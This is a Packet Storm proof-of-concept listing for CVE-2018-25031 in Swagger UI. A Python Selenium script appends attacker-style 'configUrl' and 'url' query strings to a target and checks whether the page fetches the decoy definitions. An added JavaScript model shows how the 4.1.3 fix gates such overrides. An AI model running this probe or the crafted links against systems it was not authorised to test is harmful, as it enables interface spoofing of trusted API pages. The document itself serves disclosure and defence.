Swagger UI 4.1.3 Critical Information Misrepresentation

Proof of concept exploit for the user interface misrepresentation of critical information vulnerability in Swagger UI (CVE-2018-25031): versions before 4.1.3 load an OpenAPI definition from a URL supplied in the page's query string, so a crafted link makes a trusted Swagger UI deployment render an attacker-chosen definition.

Packet Storm
Tags: web, js, auth, chrome

Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information

Date: 14 April, 2023

Exploit Author: Rafael Cintra Lopes

Vendor Homepage: https://swagger.io/

Version: < 4.1.3

CVE: CVE-2018-25031

Site: https://rafaelcintralopes.com.br/

Usage: python swagger-exploit.py https://[swagger-page].com

from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import time
import json
import sys

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python swagger-exploit.py https://[swagger-page].com")
        sys.exit(1)
    target = sys.argv[1]

    options = webdriver.ChromeOptions()
    options.add_argument("--headless")
    options.add_argument("--ignore-certificate-errors")
    options.add_argument("--log-level=3")
    options.add_experimental_option("excludeSwitches", ["enable-logging"])
    # Record Chrome DevTools performance events so every network request the page makes ends up in the log
    options.set_capability("goog:loggingPrefs", {"performance": "ALL"})

    # Browser webdriver path
    drive_service = Service("C:/chromedriver.exe")

    driver = webdriver.Chrome(service=drive_service, options=options)

    # Load the target twice, once with each query parameter a vulnerable Swagger UI honours.
    # Whether the decoy files exist does not matter: the check is whether the browser requests them at all.
    driver.get(target + "?configUrl=https://petstore.swagger.io/v2/hacked1.json")
    time.sleep(10)
    driver.get(target + "?url=https://petstore.swagger.io/v2/hacked2.json")
    time.sleep(10)

    logs = driver.get_log("performance")

    # Keep only the network-related DevTools events
    with open("log_file.json", "w", encoding="utf-8") as f:
        f.write("[")
        for log in logs:
            log_file = json.loads(log["message"])["message"]
            if ("Network.response" in log_file["method"]
                    or "Network.request" in log_file["method"]
                    or "Network.webSocket" in log_file["method"]):
                f.write(json.dumps(log_file) + ",")
        f.write("{}]")

    driver.quit()

    json_file_path = "log_file.json"
    with open(json_file_path, "r", encoding="utf-8") as f:
        logs = json.loads(f.read())

    # A request for either decoy URL means the UI accepted the attacker-controlled parameter
    for log in logs:
        try:
            url = log["params"]["request"]["url"]

            if url == "https://petstore.swagger.io/v2/hacked1.json":
                print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")

            if url == "https://petstore.swagger.io/v2/hacked2.json":
                print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")
        except Exception:
            # Events without a request URL (responses, websocket frames) are skipped
            pass

Related news

CVE-2018-25031: add an `enableQueryConfig` option · Issue #4872 · swagger-api/swagger-ui

Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.
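The following is an added example written for this page, not code from the advisory above or from Swagger UI itself. It models the behaviour behind CVE-2018-25031 in a few lines: which remote resources the UI would request given its baked-in configuration, the page's query string, and the option Swagger UI 4.1.3 introduced to gate query-string overrides (queryConfigEnabled, off by default). Assumptions: only the two query keys the exploit exercises, url and configUrl, are modelled; their precedence here is this model's choice; the origin allow-list is an extra guard added by the example and not a Swagger UI setting; the deployment URL and query strings are constructed sample input.

```javascript
// Added example (editor's illustration, not code from the advisory or from
// Swagger UI): a minimal model of the behaviour behind CVE-2018-25031.
// Assumptions: only the query keys `url` and `configUrl` are modelled (the
// two the exploit sends); `queryConfigEnabled` stands for the 4.1.3 option
// that gates query-string overrides and defaults to off; the origin
// allow-list is this example's own hardening, not a Swagger UI setting.

// Query keys that can point the UI at an attacker-chosen definition.
const OVERRIDE_KEYS = ["configUrl", "url"];

// Extract only the override keys from a location.search string.
function parseOverrides(search) {
  const params = new URLSearchParams(search);
  const overrides = {};
  for (const key of OVERRIDE_KEYS) {
    const value = params.get(key);
    if (value !== null) overrides[key] = value;
  }
  return overrides;
}

// Return the URLs the UI would request for a baked-in config, the page's
// query string, and the options described above.
function plannedFetches(baseConfig, search, options = {}) {
  const { queryConfigEnabled = false, allowedOrigins = null } = options;
  // 4.1.3 default: the query string is ignored, only the configured URL loads.
  if (!queryConfigEnabled) return [baseConfig.url];

  const overrides = parseOverrides(search);
  const fetches = [];
  for (const key of OVERRIDE_KEYS) {
    const candidate = overrides[key];
    if (candidate === undefined) continue;
    // Optional hardening: accept overrides only from allow-listed origins,
    // resolving relative values against the configured URL; unparseable
    // values are rejected rather than passed through.
    if (allowedOrigins !== null) {
      let origin;
      try {
        origin = new URL(candidate, baseConfig.url).origin;
      } catch {
        continue;
      }
      if (!allowedOrigins.includes(origin)) continue;
    }
    fetches.push(candidate);
  }
  // Nothing usable in the query string: fall back to the configured URL.
  return fetches.length > 0 ? fetches : [baseConfig.url];
}

// Pre-4.1.3 behaviour: query parameters are always honoured.
function plannedFetchesLegacy(baseConfig, search) {
  return plannedFetches(baseConfig, search, { queryConfigEnabled: true });
}

// Constructed sample: a deployment serving its own definition, hit with the
// first query string the exploit above uses.
const BASE_CONFIG = { url: "https://api.example.com/openapi.json" };
const HOSTILE_QUERY = "?configUrl=https://petstore.swagger.io/v2/hacked1.json";

console.log("pre-4.1.3:", plannedFetchesLegacy(BASE_CONFIG, HOSTILE_QUERY));
console.log("4.1.3 default:", plannedFetches(BASE_CONFIG, HOSTILE_QUERY));
console.log("4.1.3 + queryConfigEnabled:",
  plannedFetches(BASE_CONFIG, HOSTILE_QUERY, { queryConfigEnabled: true }));
console.log("queryConfigEnabled + allow-list:",
  plannedFetches(BASE_CONFIG, HOSTILE_QUERY,
    { queryConfigEnabled: true, allowedOrigins: ["https://api.example.com"] }));
```

The practical takeaways the model makes visible: upgrading to 4.1.3 closes the issue only as long as query configuration stays disabled, and a deployment that re-enables it for convenience is back to the pre-fix behaviour unless it adds its own restriction on where an override may point. The exploit above is the runtime counterpart of the first two console lines: it flags a target when the browser actually requests the decoy URL.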
